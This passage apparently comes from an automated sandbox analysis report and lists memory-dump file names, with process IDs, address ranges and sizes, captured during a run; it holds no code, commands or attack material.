                                                                                                        • memory/3852-364-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3896-346-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3936-242-0x0000000000000000-mapping.dmp
                                                                                                        • memory/3988-203-0x00007FF66BB94060-mapping.dmp
                                                                                                        • memory/3988-206-0x0000016826810000-0x000001682685B000-memory.dmp
                                                                                                          Filesize

                                                                                                          300KB

                                                                                                        • memory/3988-207-0x0000016826B40000-0x0000016826BB0000-memory.dmp
                                                                                                          Filesize

                                                                                                          448KB

                                                                                                        • memory/3988-210-0x0000016829100000-0x0000016829204000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.0MB

                                                                                                        • memory/4116-355-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4196-360-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4268-258-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4332-321-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4412-369-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4460-265-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4484-318-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4688-266-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4836-344-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4836-367-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4916-345-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4924-326-0x0000000000000000-mapping.dmp
                                                                                                        • memory/4928-271-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5016-350-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5028-332-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5196-349-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5212-361-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5232-337-0x0000000003540000-0x0000000003550000-memory.dmp
                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/5232-275-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5264-248-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5308-278-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5312-353-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5340-341-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5356-363-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5408-280-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5492-296-0x00000000047F0000-0x000000000484C000-memory.dmp
                                                                                                          Filesize

                                                                                                          368KB

                                                                                                        • memory/5492-292-0x0000000002F23000-0x0000000003024000-memory.dmp
                                                                                                          Filesize

                                                                                                          1.0MB

                                                                                                        • memory/5492-283-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5544-358-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5752-351-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5784-359-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5836-347-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5876-357-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5912-253-0x0000000002740000-0x0000000002742000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/5912-249-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5912-274-0x0000000002744000-0x0000000002745000-memory.dmp
                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/5916-348-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5920-307-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5948-252-0x0000000000000000-mapping.dmp
                                                                                                        • memory/5968-362-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6008-365-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6012-343-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6120-254-0x0000000000000000-mapping.dmp
                                                                                                        • memory/6140-312-0x0000000000000000-mapping.dmp